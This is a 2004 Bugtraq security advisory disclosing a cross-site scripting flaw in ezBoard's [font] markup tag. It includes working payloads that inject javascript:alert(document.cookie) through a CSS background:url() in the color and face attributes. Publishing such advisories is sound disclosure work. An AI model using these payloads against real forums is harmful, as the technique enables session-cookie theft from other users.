ezBoard Cross Site Scripting Vulnerability

From: Cheng Peng Su (apple_soup_at_msn.com)
Date: 02/23/04

  • Next message: Tõnu Samuel: "Somewhat new SQL Injection concept" 
    Date: 23 Feb 2004 14:09:44 -0000
To: bugtraq@securityfocus.com
    ('binary' encoding is not supported, stored as-is)

    ########################################################

    Advisory Name:ezBoard Cross Site Scripting Vulnerability
    Release Date: Feb 24,2004
    Application: ezBoard
    Version Affected: 7.3u or lower?
    Vendor URL: http://www.ezboard.com/
    Discover: Cheng Peng Su(apple_soup_at_msn.com)

    ########################################################

    Proof of Concept:
          This vuln is from [font],ezBoard doesn't filter illegal characters ,such as ';()
          
           [font color=red;background:url(javascript:{XSS code})]hey[/font] will show
           <span style="color:red;background:url(javascript:{XSS code});font-size:small;">hey</span>
           
           and
           
            [font face=Verdana;background:url(javascript:{XSS code})]hey[/font] will show
           <span style="font-family:Verdana;background:url(javascript:{XSS code}));font-size:small;">hey</span>
           

    Exploit:
            [font color=red;background:url(javascript:alert(document.cookie))]Big Exploit![/font]
            [font face=Verdana;background:url(javascript:alert(document.cookie))]Big Exploit![/font]
             
             
    Contact:
    Cheng Peng Su
    apple_soup_at_msn.com
    Class 1,Senior 2,High school attached to Wuhan University
    Wuhan,Hubei,China

  • Next message: Tõnu Samuel: "Somewhat new SQL Injection concept"